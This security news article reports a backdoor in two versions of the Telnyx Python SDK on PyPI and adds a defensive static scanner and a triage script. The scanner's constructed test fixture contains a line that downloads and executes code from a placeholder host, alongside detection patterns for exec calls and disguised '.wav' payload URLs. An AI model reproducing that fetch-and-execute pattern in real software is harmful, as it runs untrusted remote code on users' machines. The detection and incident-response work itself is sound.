Telnyx Python SDK Backdoored - Cloud Credentials at Risk

In short: attackers planted malware in a widely used Python library so that it would steal credentials from anyone who installed the tampered versions.
Hackers backdoored the Telnyx Python SDK on PyPI, exposing countless developers to credential theft. This sophisticated attack could compromise cloud services and sensitive data. Immediate action is required to mitigate risks.
What Happened
On March 27, 2026, hackers known as TeamPCP uploaded two malicious versions of the Telnyx Python SDK to PyPI, the primary repository for Python packages. These compromised versions, 4.87.1 and 4.87.2, were available for about four hours before being quarantined. During this brief period, developers who installed these versions unknowingly introduced malware into their systems, with no visible signs of infection.
The Telnyx SDK is widely used, boasting around 750,000 downloads each month. This means the potential impact of the attack extends far beyond the immediate users, affecting numerous projects and services that rely on this library. The attack was particularly insidious, as only a single file was altered, making it difficult for developers to detect the compromise.
How It Works
The malicious code was embedded within a file called _client.py. When the library was imported, the altered code ran silently and chose its behaviour based on the operating system. On Windows, it triggered a function that fetched a hidden payload disguised as a WAV audio file from a remote server. On Linux and macOS, the malware executed a Python script in memory, avoiding detection by never writing it to disk.
This malware was designed to harvest sensitive information, including SSH keys, cloud provider credentials, and Kubernetes secrets. Once collected, the data was encrypted and sent to an attacker-controlled server. The stealthy nature of this attack means that it can spread rapidly, especially in environments that use Kubernetes.
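The shape described above (code that runs at import time, branches on the operating system, fetches something remote and hands it to dynamic execution, or references a remote file that pretends to be audio) can be triaged statically. The scanner below is an added example written for this article; it is not code from Telnyx, from the article, or from the actual backdoor. The indicator vocabularies, the placeholder hostnames and both sample modules are constructed for illustration.

```python
import ast
from pathlib import Path
from typing import Dict, List

# Indicator vocabularies (assumed heuristics for this example, not a published signature).
EXEC_CALLS = {"exec", "eval"}                              # dynamic code execution
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "post"}    # outbound fetch
OS_PROBES = {("platform", "system"), ("sys", "platform"), ("os", "name")}


def _call_name(node: ast.Call) -> str:
    """Bare callee name: exec(...) -> 'exec', requests.get(...) -> 'get'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def scan_module_source(src: str) -> Dict[str, List[int]]:
    """Map each indicator to the sorted line numbers where it appears in src."""
    hits: Dict[str, List[int]] = {
        "dynamic_exec": [], "network_fetch": [], "os_probe": [], "audio_url": []
    }
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_CALLS:
                hits["dynamic_exec"].append(node.lineno)
            elif name in FETCH_CALLS:
                hits["network_fetch"].append(node.lineno)
        elif isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
            if (node.value.id, node.attr) in OS_PROBES:
                hits["os_probe"].append(node.lineno)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value.lower()
            # A remote URL whose target claims to be audio is the disguise the article names.
            if text.startswith("http") and text.endswith(".wav"):
                hits["audio_url"].append(node.lineno)
    return {k: sorted(v) for k, v in hits.items()}


def is_suspicious(hits: Dict[str, List[int]]) -> bool:
    """A fetch feeding dynamic execution, or a remote 'audio' URL, deserves a human look."""
    fetch_then_exec = bool(hits["network_fetch"]) and bool(hits["dynamic_exec"])
    return fetch_then_exec or bool(hits["audio_url"])


def scan_tree(root: str) -> List[str]:
    """Walk an installed package tree and return the modules that trip the heuristic."""
    flagged = []
    for path in Path(root).rglob("*.py"):
        try:
            hits = scan_module_source(path.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue  # not parseable as Python 3; skip rather than abort the sweep
        if is_suspicious(hits):
            flagged.append(str(path))
    return flagged


# Constructed fixtures (not the real backdoor): the import-time shape the article describes,
# and an ordinary SDK-style module that also talks to the network but never executes it.
SUSPICIOUS_SAMPLE = """\
import platform
from urllib.request import urlopen

def _stage():
    exec(urlopen("https://placeholder.invalid/stage").read())

if platform.system() == "Windows":
    urlopen("https://placeholder.invalid/notes.wav")
else:
    _stage()
"""

BENIGN_SAMPLE = """\
import requests

def fetch_balance(api_key: str) -> dict:
    resp = requests.get("https://api.example.invalid/v2/balance",
                        headers={"Authorization": "Bearer " + api_key})
    return resp.json()
"""


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        found = scan_module_source(sample)
        print(label, is_suspicious(found), found)
```

The heuristic is deliberately coarse: a legitimate SDK fetches data over the network all the time, so a fetch on its own is not a finding. The combination with exec/eval is what separates the fixture modelled on the article from the benign one, and `scan_tree` lets you sweep a site-packages directory for that combination.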
Who's Being Targeted
The primary targets of this attack are developers and organizations using the Telnyx SDK. Given the SDK's popularity, the number of affected users could be significant. The sophistication of the attack suggests that TeamPCP is not only targeting individual developers but also aiming to infiltrate larger systems and networks.
This incident highlights the vulnerabilities present in the software supply chain. Developers often trust packages from repositories like PyPI, which makes those packages attractive targets for stealthy attacks of this kind. The potential for widespread damage is alarming, as compromised credentials could lead to unauthorized access to cloud services and sensitive data.
What You Should Do
Organizations that installed the compromised versions of the Telnyx SDK should treat this as a confirmed breach. Immediate incident response is crucial. All credentials accessible from affected systems must be rotated, including those for AWS, GCP, and Azure.
Simply uninstalling the malicious package will not eliminate the backdoor. Windows users need to remove msbuild.exe from the Startup folder, while Linux users must delete the sysmon.py file. In Kubernetes environments, audit and remove any suspicious pods. Additionally, developers should implement security best practices, such as enabling two-factor authentication on their accounts and avoiding the storage of secrets in easily accessible files. Blocking outbound connections to known malicious servers is also recommended.
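The response steps above (check whether a compromised version is installed or pinned, look for the persistence artifacts, and decide whether credentials must be rotated) can be scripted. The triage helper below is an added example for this article, not code from Telnyx or from any incident-response tool. The two version numbers and the artifact file names come from the article; the per-user Startup folder is the standard Windows location, while searching the home directory for sysmon.py is an assumption, since the article does not say where that file is written.

```python
import importlib.metadata
import os
from pathlib import Path
from typing import Dict, List, Optional

PACKAGE = "telnyx"
COMPROMISED_VERSIONS = {"4.87.1", "4.87.2"}   # the two versions named in the article

# Persistence artifacts named in the article (file names only; locations are assumptions
# apart from the standard per-user Windows Startup folder used in default_search_dirs).
ARTIFACT_NAMES = {"msbuild.exe", "sysmon.py"}


def installed_version(dist: str = PACKAGE) -> Optional[str]:
    """Version of the installed distribution, or None if it is not installed."""
    try:
        return importlib.metadata.version(dist)
    except importlib.metadata.PackageNotFoundError:
        return None


def is_compromised_version(version: Optional[str]) -> bool:
    return version is not None and version.strip() in COMPROMISED_VERSIONS


def find_pinned_versions(requirements_text: str, package: str = PACKAGE) -> List[str]:
    """Exact '==' pins of `package` in requirements/constraints text; comments and markers ignored."""
    pins = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        name, sep, version = line.partition("==")
        name = name.split("[", 1)[0].strip().lower()   # drop extras such as telnyx[foo]
        if sep and name == package:
            pins.append(version.strip())
    return pins


def classify_artifacts(paths: List[str]) -> List[str]:
    """Return the paths whose file name matches a known persistence artifact."""
    return [p for p in paths if Path(p).name.lower() in ARTIFACT_NAMES]


def default_search_dirs() -> List[Path]:
    """Home directory (assumed location for sysmon.py) plus the Windows Startup folder."""
    dirs = [Path.home()]
    appdata = os.environ.get("APPDATA")
    if appdata:   # standard per-user Startup folder on Windows
        dirs.append(Path(appdata) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup")
    return dirs


def find_artifacts_on_disk(search_dirs: List[Path], max_depth: int = 3) -> List[str]:
    """Shallow walk of the given directories, returning matching artifact paths."""
    found = []
    for base in search_dirs:
        if not base.is_dir():
            continue
        for root, subdirs, files in os.walk(base):
            if len(Path(root).relative_to(base).parts) >= max_depth:
                subdirs[:] = []   # prune: do not descend further than max_depth
            found.extend(classify_artifacts([str(Path(root) / f) for f in files]))
    return found


def triage(version: Optional[str], requirements_text: str,
           candidate_paths: List[str]) -> Dict[str, object]:
    """Combine the three checks into one report; any hit means credential rotation."""
    bad_pins = [v for v in find_pinned_versions(requirements_text) if v in COMPROMISED_VERSIONS]
    artifacts = classify_artifacts(candidate_paths)
    hit = is_compromised_version(version) or bool(bad_pins) or bool(artifacts)
    return {
        "installed_version": version,
        "compromised_install": is_compromised_version(version),
        "compromised_pins": bad_pins,
        "artifacts": artifacts,
        # The article's guidance: treat any hit as a breach and rotate every reachable credential.
        "rotate_credentials": hit,
    }


if __name__ == "__main__":
    req_text = Path("requirements.txt").read_text() if Path("requirements.txt").exists() else ""
    report = triage(installed_version(), req_text, find_artifacts_on_disk(default_search_dirs()))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run it from the project directory on each build host and developer machine; a `rotate_credentials: True` line means the article's breach playbook applies (rotate AWS, GCP and Azure credentials, remove the listed artifacts, audit Kubernetes pods), and a clean report only covers the indicators the article names, not a guarantee that nothing else was left behind.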